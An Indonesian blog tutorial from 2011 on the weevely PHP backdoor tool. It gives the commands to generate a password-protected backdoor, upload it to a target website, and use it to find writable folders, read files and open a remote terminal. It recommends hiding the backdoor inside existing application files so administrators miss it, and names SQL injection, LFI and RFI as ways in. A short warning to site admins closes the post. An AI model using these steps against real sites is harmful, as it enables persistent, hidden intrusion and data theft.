what ????
weevely.,.heee.,.ini tutorial untuk sahabat-sahabat yang suka bermain-main dengan website.,.:)
bosan juga yhee.,.klo metasploit truzzz.,.spoofing,sniffing.,.:D
sekali-sekali ga ada salahnya kalo saya menulis tentang web attack juga.,.:p
dulu.,.waktu backtrack masih belum merilis versi 5, tools ini sudah ada di salah satu distro security yang di kembangkan oleh orang italia..:D
& sampai sekarang masih terus di kembangkan koq.,.:), (backbox), ringan,flexible, & mudah di gunakan...basednya juga 10.04..
mungkin karena kalah nama aza sama yang namanya backtrack kali yhe.,.:D
& sekarang backtrack 5 sudah mengadopsi tools yang satu ini..:)
weevely adalah backdoor,,
muncul berbagai pertanyaan :D awal kisah kita mulai dari TKP>>>>
^ apa itu backdoor????
* back=belakang door=pintu heee...
jadi bisa dibilang backdoor adalah pintu belakang,.:), teman-teman yang bergelut di dunia web attack pasti paham tentang hal ini..:)
^ truz apa kegunaannya mas???
* gunanya dengan backdoor kita bisa meng-akses suatu web tanpa harus menggunakan halaman login adminnya...:)
tentu saja ini sangat memudahkan...jika selama ini yang sering di gunakan sebagai backdoor dalam bentuk shell (akses dari web browser),
maka kali ini kita menggunakan terminal langsung dari linux (dalam hal ini backtrack)
^ hhhmmm.,.kalau begitu apa kelebihannya????
1. dengan weevely kita bisa menciptakan password sendiri??
2. kita bisa membuat file baru secara tunggal / menyisipkan script backdoor ini pada file yang sudah ada
3. lebih simple
4. Menghindari beberapa konfigurasi PHP yang membatasi pelaksanaan perintah-perintah pada sistem
5. Menciptakan PHP backdoor dienkripsi secara dinamis
6. dan lain sebagainya...:)
kalau tidak di coba sendiri maka tidak akan tau.,.wekz.,.:p
^ btw siapa see pengembangnya??
sejauh ini cuma ada 2
yang pertama
Emilio Pinna
yang kedua
evilsocket (pengembang backbox)
^ jangan bertele-tele mas...langsung saja ke cara penggunaannya???
* oke....saya coba bantu secara umum sajha y...:p
untuk membuat backdoor baru commandnya begini :
weevely -g -o
ex :
weevely -g -o backdoorku.php -p passwordku
selanjutnya akan menghasilkan 1 file baru di folder anda ketik "ls"
ada kan???:p, klo ga ada silahkan ambil wudhu..shalat dulu bentar.,.heee.,.:p
nach sekarang tinggal di upload saja di server target...:p
misal letak filenya ada di
http://www.target.net/images/backdoorku.php
sekarang tinggal panggil sajha lewat terminal...:)
ada banyak module yang bisa kita gunkan..diantaranya
untuk mencari folder writeable
./weevely -m search_writable_path -u http://www.target.net/images/backdoorku.php -p passwordku
untuk membaca data
./weevely -m read_file:/data/orangganteng.php -u http://www.target.net/images/backdoorku.php -p passwordku
untuk mengambil terminal, kurang lebih seperti backconnect
./weevely -t -u http://www.target.net/images/backdoorku.php -p passwordku
dan lain sebagainya...:)
^ oh y mas gimana caranya biar bisa naruh backdoor di web target???
back t0 basic....dulu klo muncul pertanyaan seperti ini.,.:D
google...keyword : sql injection, lfi, rfi, CSRF, LFD & lain sebagainya....:D
weevely biasa di gunakan untuk mengamankan server secara permanent.,.:p, jika shell berbentuk *php tidak akan bertahan lama karena
akan segera di hapus jika ketahuan...oleh pengelola server...
nach.,.weevely sering di sisipkan ke dalam file-file / content-content yang sudah ada di dalam aplikasi web itu sendiri.,.=)) kapokk....
jadi jelas akan lebih sulit untuk di deteksi...:)
terakhir dari saya...berhati-hati lah untuk admin-admin yang ada..khususnya yang ada di indonesia...
because no path for human stupidity...hee,..
teliti & rajin-rajinlah mengecek web, jika perlu sesekali cek juga code-code yang ada di dalam web aplikasi...:)
jika sahabat-sahabat bingung dengan tulisan ini...jangan khawatir...:D
saya juga membuatkan versi videonya.,.jadi tinggal di download & di pelajari sajha.,.:)
http://www.4shared.com/file/j3akYfSt/weevely_by_yur4kh4.html
total file : 32,106 KB | 2011-05-27 | zip
format video : *.ogv (linux dedicated)
semoga tulisan & video ini bisa bermanfaat & berguna untuk sahabat-sahabat semua.,.AMIN...
thankz : "Malang cyber crew"
regards : yur4kh4
Tidak ada komentar:
Posting Komentar
silahkan berkomentar...